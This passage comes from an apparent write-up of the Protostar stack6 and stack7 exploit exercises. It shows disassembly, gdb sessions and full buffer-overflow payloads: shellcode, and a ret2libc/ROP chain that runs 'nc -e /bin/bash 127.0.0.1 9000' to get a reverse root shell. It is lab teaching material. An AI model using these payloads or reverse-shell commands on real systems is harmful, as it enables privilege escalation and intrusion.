eax,ds:0x8049728 8048444: 39 d8 cmp eax,ebx 8048446: 72 e8 jb 8048430 <__do_global_dtors_aux+0x30> 8048448: c6 05 24 97 04 08 01 mov BYTE PTR ds:0x8049724,0x1 804844f: 83 c4 04 add esp,0x4 8048452: 5b pop ebx 8048453: 5d pop ebp 8048454: c3 ret 8048455: 8d 74 26 00 lea esi,[esi+eiz*1+0x0] 8048459: 8d bc 27 00 00 00 00 lea edi,[edi+eiz*1+0x0] 08048460 <frame_dummy>: 8048460: 55 push ebp 8048461: 89 e5 mov ebp,esp 8048463: 83 ec 18 sub esp,0x18 8048466: a1 14 96 04 08 mov eax,ds:0x8049614 804846b: 85 c0 test eax,eax 804846d: 74 12 je 8048481 <frame_dummy+0x21> 804846f: b8 00 00 00 00 mov eax,0x0 8048474: 85 c0 test eax,eax 8048476: 74 09 je 8048481 <frame_dummy+0x21> 8048478: c7 04 24 14 96 04 08 mov DWORD PTR [esp],0x8049614 804847f: ff d0 call eax 8048481: c9 leave 8048482: c3 ret 8048483: 90 nop 08048484 <getpath>: 8048484: 55 push ebp 8048485: 89 e5 mov ebp,esp 8048487: 83 ec 68 sub esp,0x68 804848a: b8 d0 85 04 08 mov eax,0x80485d0 804848f: 89 04 24 mov DWORD PTR [esp],eax 8048492: e8 29 ff ff ff call 80483c0 <printf@plt> 8048497: a1 20 97 04 08 mov eax,ds:0x8049720 804849c: 89 04 24 mov DWORD PTR [esp],eax 804849f: e8 0c ff ff ff call 80483b0 <fflush@plt> 80484a4: 8d 45 b4 lea eax,[ebp-0x4c] 80484a7: 89 04 24 mov DWORD PTR [esp],eax 80484aa: e8 d1 fe ff ff call 8048380 <gets@plt> 80484af: 8b 45 04 mov eax,DWORD PTR [ebp+0x4] 80484b2: 89 45 f4 mov DWORD PTR [ebp-0xc],eax 80484b5: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc] 80484b8: 25 00 00 00 bf and eax,0xbf000000 80484bd: 3d 00 00 00 bf cmp eax,0xbf000000 80484c2: 75 20 jne 80484e4 <getpath+0x60> 80484c4: b8 e4 85 04 08 mov eax,0x80485e4 80484c9: 8b 55 f4 mov edx,DWORD PTR [ebp-0xc] 80484cc: 89 54 24 04 mov DWORD PTR [esp+0x4],edx 80484d0: 89 04 24 mov DWORD PTR [esp],eax 80484d3: e8 e8 fe ff ff call 80483c0 <printf@plt> 80484d8: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1 80484df: e8 bc fe ff ff call 80483a0 <_exit@plt> 80484e4: b8 f0 85 04 08 mov eax,0x80485f0 80484e9: 8d 55 b4 lea edx,[ebp-0x4c] 80484ec: 89 54 24 04 mov DWORD PTR [esp+0x4],edx 80484f0: 89 04 24 mov DWORD PTR [esp],eax 80484f3: e8 c8 fe ff ff call 80483c0 <printf@plt> 80484f8: c9 leave 80484f9: c3 ret 080484fa <main>: 80484fa: 55 push ebp 80484fb: 89 e5 mov ebp,esp 80484fd: 83 e4 f0 and esp,0xfffffff0 8048500: e8 7f ff ff ff call 8048484 <getpath> 8048505: 89 ec mov esp,ebp 8048507: 5d pop ebp 8048508: c3 ret 8048509: 90 nop 804850a: 90 nop 804850b: 90 nop 804850c: 90 nop 804850d: 90 nop 804850e: 90 nop 804850f: 90 nop 08048510 <__libc_csu_fini>: 8048510: 55 push ebp 8048511: 89 e5 mov ebp,esp 8048513: 5d pop ebp 8048514: c3 ret 8048515: 8d 74 26 00 lea esi,[esi+eiz*1+0x0] 8048519: 8d bc 27 00 00 00 00 lea edi,[edi+eiz*1+0x0] 08048520 <__libc_csu_init>: 8048520: 55 push ebp 8048521: 89 e5 mov ebp,esp 8048523: 57 push edi 8048524: 56 push esi 8048525: 53 push ebx 8048526: e8 4f 00 00 00 call 804857a <__i686.get_pc_thunk.bx> 804852b: 81 c3 c1 11 00 00 add ebx,0x11c1 8048531: 83 ec 1c sub esp,0x1c 8048534: e8 f7 fd ff ff call 8048330 <_init> 8048539: 8d bb 18 ff ff ff lea edi,[ebx-0xe8] 804853f: 8d 83 18 ff ff ff lea eax,[ebx-0xe8] 8048545: 29 c7 sub edi,eax 8048547: c1 ff 02 sar edi,0x2 804854a: 85 ff test edi,edi 804854c: 74 24 je 8048572 <__libc_csu_init+0x52> 804854e: 31 f6 xor esi,esi 8048550: 8b 45 10 mov eax,DWORD PTR [ebp+0x10] 8048553: 89 44 24 08 mov DWORD PTR [esp+0x8],eax 8048557: 8b 45 0c mov eax,DWORD PTR [ebp+0xc] 804855a: 89 44 24 04 mov DWORD PTR [esp+0x4],eax 804855e: 8b 45 08 mov eax,DWORD PTR [ebp+0x8] 8048561: 89 04 24 mov DWORD PTR [esp],eax 8048564: ff 94 b3 18 ff ff ff call DWORD PTR [ebx+esi*4-0xe8] 804856b: 83 c6 01 add esi,0x1 804856e: 39 fe cmp esi,edi 8048570: 72 de jb 8048550 <__libc_csu_init+0x30> 8048572: 83 c4 1c add esp,0x1c 8048575: 5b pop ebx 8048576: 5e pop esi 8048577: 5f pop edi 8048578: 5d pop ebp 8048579: c3 ret 0804857a <__i686.get_pc_thunk.bx>: 804857a: 8b 1c 24 mov ebx,DWORD PTR [esp] 804857d: c3 ret 804857e: 90 nop 804857f: 90 nop 08048580 <__do_global_ctors_aux>: 8048580: 55 push ebp 8048581: 89 e5 mov ebp,esp 8048583: 53 push ebx 8048584: 83 ec 04 sub esp,0x4 8048587: a1 04 96 04 08 mov eax,ds:0x8049604 804858c: 83 f8 ff cmp eax,0xffffffff 804858f: 74 13 je 80485a4 <__do_global_ctors_aux+0x24> 8048591: bb 04 96 04 08 mov ebx,0x8049604 8048596: 66 90 xchg ax,ax 8048598: 83 eb 04 sub ebx,0x4 804859b: ff d0 call eax 804859d: 8b 03 mov eax,DWORD PTR [ebx] 804859f: 83 f8 ff cmp eax,0xffffffff 80485a2: 75 f4 jne 8048598 <__do_global_ctors_aux+0x18> 80485a4: 83 c4 04 add esp,0x4 80485a7: 5b pop ebx 80485a8: 5d pop ebp 80485a9: c3 ret 80485aa: 90 nop 80485ab: 90 nop Disassembly of section .fini: 080485ac <_fini>: 80485ac: 55 push ebp 80485ad: 89 e5 mov ebp,esp 80485af: 53 push ebx 80485b0: 83 ec 04 sub esp,0x4 80485b3: e8 00 00 00 00 call 80485b8 <_fini+0xc> 80485b8: 5b pop ebx 80485b9: 81 c3 34 11 00 00 add ebx,0x1134 80485bf: e8 3c fe ff ff call 8048400 <__do_global_dtors_aux> 80485c4: 59 pop ecx 80485c5: 5b pop ebx 80485c6: c9 leave 80485c7: c3 ret

All we're looking for here is a ret instruction, there are a few, we'll use the 1 on line 258, the address of this is 80485a9 so this will be our return address.

After the return address we insert some junk data (4 bytes) and then we will put the address of our shellcode.

First let's find the address that our shellcode will be at, this needs to be done in 2 terminals:

1 2	user@protostar:/opt/protostar/bin$ ./stack6 input path please:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57

root@protostar:/# ps ax | grep stack6 2221 pts/0 S+ 0:00 ./stack6 2268 pts/1 S+ 0:00 grep stack6 root@protostar:/# gdb -q -p 2221 Attaching to process 2221 Reading symbols from /opt/protostar/bin/stack6...done. Reading symbols from /lib/libc.so.6...Reading symbols from /usr/lib/debug/lib/libc-2.11.2.so...done. (no debugging symbols found)...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...Reading symbols from /usr/lib/debug/lib/ld-2.11.2.so...done. (no debugging symbols found)...done. Loaded symbols for /lib/ld-linux.so.2 0xb7f53c1e in __read_nocancel () at ../sysdeps/unix/syscall-template.S:82 82 ../sysdeps/unix/syscall-template.S: No such file or directory. in ../sysdeps/unix/syscall-template.S (gdb) set disassembly-flavor intel Current language: auto The current source language is "auto; currently asm". (gdb) disassemble getpath Dump of assembler code for function getpath: 0x08048484 <getpath+0>: push ebp 0x08048485 <getpath+1>: mov ebp,esp 0x08048487 <getpath+3>: sub esp,0x68 0x0804848a <getpath+6>: mov eax,0x80485d0 0x0804848f <getpath+11>: mov DWORD PTR [esp],eax 0x08048492 <getpath+14>: call 0x80483c0 <printf@plt> 0x08048497 <getpath+19>: mov eax,ds:0x8049720 0x0804849c <getpath+24>: mov DWORD PTR [esp],eax 0x0804849f <getpath+27>: call 0x80483b0 <fflush@plt> 0x080484a4 <getpath+32>: lea eax,[ebp-0x4c] 0x080484a7 <getpath+35>: mov DWORD PTR [esp],eax 0x080484aa <getpath+38>: call 0x8048380 <gets@plt> 0x080484af <getpath+43>: mov eax,DWORD PTR [ebp+0x4] 0x080484b2 <getpath+46>: mov DWORD PTR [ebp-0xc],eax 0x080484b5 <getpath+49>: mov eax,DWORD PTR [ebp-0xc] 0x080484b8 <getpath+52>: and eax,0xbf000000 0x080484bd <getpath+57>: cmp eax,0xbf000000 0x080484c2 <getpath+62>: jne 0x80484e4 <getpath+96> 0x080484c4 <getpath+64>: mov eax,0x80485e4 0x080484c9 <getpath+69>: mov edx,DWORD PTR [ebp-0xc] 0x080484cc <getpath+72>: mov DWORD PTR [esp+0x4],edx 0x080484d0 <getpath+76>: mov DWORD PTR [esp],eax 0x080484d3 <getpath+79>: call 0x80483c0 <printf@plt> 0x080484d8 <getpath+84>: mov DWORD PTR [esp],0x1 0x080484df <getpath+91>: call 0x80483a0 <_exit@plt> 0x080484e4 <getpath+96>: mov eax,0x80485f0 0x080484e9 <getpath+101>: lea edx,[ebp-0x4c] 0x080484ec <getpath+104>: mov DWORD PTR [esp+0x4],edx 0x080484f0 <getpath+108>: mov DWORD PTR [esp],eax 0x080484f3 <getpath+111>: call 0x80483c0 <printf@plt> 0x080484f8 <getpath+116>: leave 0x080484f9 <getpath+117>: ret End of assembler dump. (gdb) break *0x080484af Breakpoint 1 at 0x80484af: file stack6/stack6.c, line 15. (gdb) c Continuing.

1	AAAAAAAAAAAA

1 2 3 4 5 6 7 8 9 10 11

Breakpoint 1, getpath () at stack6/stack6.c:15 15 stack6/stack6.c: No such file or directory. in stack6/stack6.c Current language: auto The current source language is "auto; currently c". (gdb) x/20xw $esp 0xbffff770: 0xbffff78c 0x00000000 0xb7fe1b28 0x00000001 0xbffff780: 0x00000000 0x00000001 0xb7fff8f8 0x41414141 0xbffff790: 0x41414141 0x41414141 0xbffff700 0xb7eada75 0xbffff7a0: 0xb7fd7ff4 0x080496ec 0xbffff7b8 0x0804835c 0xbffff7b0: 0xb7ff1040 0x080496ec 0xbffff7e8 0x08048539

This means our payload will start at 0xbffff780+0xc = 0xbffff78c.

For this challenge I will put the shellcode at the end of the payload, we know the starting address of our payload and how many bytes until the shellcode so our shellcode will be at 0xbffff78c+0x58 = 0xbffff7e4.

I first tried with a normal shellcode that I had written but it didn't work:

1 2 3 4 5

user@protostar:/opt/protostar/bin$ python -c 'print "A"*80 + "\xa9\x85\x04\x08" + "\xe4\xf7\xff\xbf" + "\xeb\x25\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x31\xd2\xb2\x09\x42\x89\x1c\x13\x31\xc9\x89\x4b\x0e\x8d\x0c\x13\x8d\x53\x0e\xcd\x80\xe8\xd6\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"' | ./stack6 input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA�������%1�̀��[�C � 1Ҳ B�1ɉK�/span/span span class="code-line"span class="go" �S̀�����/bin/bashABBBBCCCC/span/span span class="code-line"span class="gp"user@protostar:/opt/protostar/bin$/span/span span class="code-line"/code/pre/div /td/tr/table pSo it launched... Don't know what happened here, after some investigation I decided that it did actually run code/bin/bash/code but exited straight away./p pAfter some thinking I decide that I'm going to get codeexecve/code to run codebash/code and that to run codenc/code to execute a shell, there are plenty of ways to get a shell in this situation, creating a script and running that, running codenc/code directly..., this was just the first 1 that come to mind for me./p pcodenc/code or a href="http://netcat.sourceforge.net/" target="_blank"netcat/a is a handy networking tool that can be used for a number of things, here we will use it to execute a shell./p pSo I rewrote the shellcode, started codenc/code listening on port 9000 in 1 terminal:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:~$ /spannc -l -p span class="m"9000/span/span span class="code-line"/code/pre/div /td/tr/table pAnd then launched the exploit with the new shellcode:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spanpython -c span class="s1"#39;print quot;Aquot;*80 + quot;\xa9\x85\x04\x08quot; + quot;\xe4\xf7\xff\xbfquot; + quot;\xeb\x37\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\x88\x43\x0c\x88\x43\x2b\xb0\x0b\x31\xd2\xb2\x09\x42\x89\x5b\x2c\x8d\x0c\x13\x89\x4b\x30\x8d\x4b\x0d\x89\x4b\x34\x31\xc9\x89\x4b\x38\x8d\x4b\x2c\x8d\x53\x34\xcd\x80\xe8\xc4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x2d\x63\x42\x6e\x63\x20\x2d\x65\x20\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x20\x39\x30\x30\x30\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46\x47\x47\x47\x47quot;#39;/span span class="p"|/span ./stack6/span span class="code-line"span class="go"input path please: got path 1�̀��[�C �C/span/span span class="code-line"span class="go" �C+�/span/span span class="code-line"span class="go" 1ҲB�[,�/span/span span class="code-line"span class="go"�K41ɉK8�K,�S4̀�����/bin/bashA-cBnc -e /bin/bash 127.0.0.1 9000CDDDDEEEEFFFFGGGG/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"ls/span/span span class="code-line"span class="go"final0/span/span span class="code-line"span class="go"final1/span/span span class="code-line"span class="go"final2/span/span span class="code-line"span class="go"format0/span/span span class="code-line"span class="go"format1/span/span span class="code-line"span class="go"format2/span/span span class="code-line"span class="go"format3/span/span span class="code-line"span class="go"format4/span/span span class="code-line"span class="go"heap0/span/span span class="code-line"span class="go"heap1/span/span span class="code-line"span class="go"heap2/span/span span class="code-line"span class="go"heap3/span/span span class="code-line"span class="go"net0/span/span span class="code-line"span class="go"net1/span/span span class="code-line"span class="go"net2/span/span span class="code-line"span class="go"net3/span/span span class="code-line"span class="go"net4/span/span span class="code-line"span class="go"stack0/span/span span class="code-line"span class="go"stack1/span/span span class="code-line"span class="go"stack2/span/span span class="code-line"span class="go"stack3/span/span span class="code-line"span class="go"stack4/span/span span class="code-line"span class="go"stack5/span/span span class="code-line"span class="go"stack6/span/span span class="code-line"span class="go"stack7/span/span span class="code-line"span class="go"whoami/span/span span class="code-line"span class="go"root/span/span span class="code-line"/code/pre/div /td/tr/table pSo, we can still run our shellcode, we just have an extra step to bypass the check that is done on the return address./p h2Stack6: Ret2Libc and ROP/h2 pHere we will recreate the exact same exploit for the same application but without using any shellcode./p pFirst its easiest if we create what we want to run in C first:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="n"setuid/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"execve/spanspan class="p"(/spanspan class="s"quot;/bin/bashquot;/spanspan class="p",/spanspan class="w" /spanspan class="p"{/spanspan class="w" /spanspan class="s"quot;/bin/bashquot;/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;-cquot;/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;nc -e /bin/bash 127.0.0.1 9000quot;/spanspan class="w" /spanspan class="p"},/spanspan class="w" /spanspan class="nb"NULL/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pSo we need to find the addresses of both codesetuid/code and codeexecve/code, we use codegdb/code for this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spangdb -q ./stack6/span span class="code-line"span class="go"Reading symbols from /opt/protostar/bin/stack6...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span span class="code-line"span class="go"Dump of assembler code for function main:/span/span span class="code-line"span class="go"0x080484fa lt;main+0gt;: push %ebp/span/span span class="code-line"span class="go"0x080484fb lt;main+1gt;: mov %esp,%ebp/span/span span class="code-line"span class="go"0x080484fd lt;main+3gt;: and $0xfffffff0,%esp/span/span span class="code-line"span class="go"0x08048500 lt;main+6gt;: call 0x8048484 lt;getpathgt;/span/span span class="code-line"span class="go"0x08048505 lt;main+11gt;: mov %ebp,%esp/span/span span class="code-line"span class="go"0x08048507 lt;main+13gt;: pop %ebp/span/span span class="code-line"span class="go"0x08048508 lt;main+14gt;: ret /span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x080484fa/span/span span class="code-line"span class="go"Breakpoint 1 at 0x80484fa: file stack6/stack6.c, line 26./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /opt/protostar/bin/stack6 /span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 1, main (argc=1, argv=0xbffff864) at stack6/stack6.c:26/span/span span class="code-line"span class="go"26 stack6/stack6.c: No such file or directory./span/span span class="code-line"span class="go" in stack6/stack6.c/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print setuid/span/span span class="code-line"span class="gp"$/spanspan class="nv"1/span span class="o"=/span span class="o"{/spanlt;text variable, no debug infogt;span class="o"}/span 0xb7f2ec80 lt;__setuidgt;/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print execve/span/span span class="code-line"span class="gp"$/spanspan class="nv"2/span span class="o"=/span span class="o"{/spanlt;text variable, no debug infogt;span class="o"}/span 0xb7f2e170 lt;__execvegt;/span span class="code-line"/code/pre/div /td/tr/table pAs you can see, the address of setuid doesn't start with codebf/code so we can use this as our initial return address./p pWe now want to address of our ROP gadget, this will just be responsible for cleaning up the stack after the call to setuid, so this time we want a codepop [register], ret/code sequence of instructions./p pAgain we can use codeobjdump/code to find this, I won't post another dump of the binary but there are many of these sequencies we can use, I'll use the one at code0x80485a8/code./p pWe can put our strings in to variables but this time, because we can insert null bytes (strong\0/strong), I will put the strings at the start of the payload./p pThe number of bytes that the strings will occupy is:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spanspan class="nb"echo/span -n span class="s2"quot;/bin/bash -c nc -e /bin/bash 127.0.0.1 9000 quot;/span span class="p"|/span wc -c/span span class="code-line"span class="go"44/span/span span class="code-line"/code/pre/div /td/tr/table pWe know we have 80 bytes before we overwrite the return address, so we need code80-44 = 36/code bytes of padding after our strings./p pSo here is how we want the stack to look after we overflow it:/p pimg src="/assets/images/x86-32-linux/pseudo-stack.jpg" width="400"/p pWe have all of these addresses except 11, 12, 14 and 15. Let's work these out now./p pFirst 14 is just 10 bytes away from the start of our payload, and we already know the start of our payload is code0xbffff78c/code from the last exploit, so code0xbffff78c+0xa = 0xbffff796/code./p p15 is just 3 bytes from 13 so code0xbffff796+0x3 = 0xbffff799/code./p p11 is the start of our payload plus 80 bytes, then plus code8*4 = 32/code (there are 8 addresses before the argument list starts, each 4 bytes long), so code0xbffff78c+0x50+0x20 = 0xbffff7fc/code./p p12 is just code3*4 = 12/code bytes away from 10 (because there are 3 4 byte addresses before the null pointer), so code0xbffff7fc+0xc = 0xbffff808/code./p pSo with all of this information our stack should look like this:/p pimg src="/assets/images/x86-32-linux/stack6-payload.jpg" width="400"/p pObviously all of the addresses have to be put in in a href="https://en.wikipedia.org/wiki/Endianness#Little-endian" target="_blank"little endian/a format./p pNow we can test this, first start our listener:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:~$ /spannc -l -p span class="m"9000/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spanpython -c span class="s1"#39;print quot;/bin/bash\x00-c\x00nc -e /bin/bash 127.0.0.1 9000\x00quot; + quot;Aquot; * 36 + quot;\x80\xec\xf2\xb7quot; + quot;\xa8\x85\x04\x08quot; + quot;\x00\x00\x00\x00quot; + quot;\x70\xe1\xf2\xb7quot; + quot;JUNKquot; + quot;\x8c\xf7\xff\xbfquot; + quot;\xfc\xf7\xff\xbfquot; + quot;\x08\xf8\xff\xbfquot; + quot;\x8c\xf7\xff\xbfquot; + quot;\x96\xf7\xff\xbfquot; + quot;\x99\xf7\xff\xbfquot; + quot;\x00\x00\x00\x00quot;#39;/span span class="p"|/span ./stack6/span span class="code-line"span class="go"input path please: got path /bin/bash/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"pwd/span/span span class="code-line"span class="go"/opt/protostar/bin/span/span span class="code-line"span class="go"whoami/span/span span class="code-line"span class="go"root/span/span span class="code-line"/code/pre/div /td/tr/table pSolved!/p h2Stack7: The App/h2 pThis challenge is very similar to the previous 1 except the return address is not allowed to begin with codeb/code instead of codebf/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;unistd.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="nf"getpath/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"buffer/spanspan class="p"[/spanspan class="mi"64/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"ret/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;input path please: quot;/spanspan class="p");/spanspan class="w" /spanspan class="n"fflush/spanspan class="p"(/spanspan class="n"stdout/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"gets/spanspan class="p"(/spanspan class="n"buffer/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"ret/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"__builtin_return_address/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="p"((/spanspan class="n"ret/spanspan class="w" /spanspan class="o"amp;/spanspan class="w" /spanspan class="mh"0xb0000000/spanspan class="p")/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mh"0xb0000000/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;bzzzt (%p)/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"ret/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"_exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;got path %s/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"buffer/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"strdup/spanspan class="p"(/spanspan class="n"buffer/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"getpath/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table h2Stack7: Exploitation/h2 pWe could use exactly the same method as the last 1 and just put a pointer to a coderet/code instruction before the call to codesetuid/code but I want to show a different way to do it./p pI'm going to use codesystem/code instead of codeexecve/code and put my string into an environment variable./p 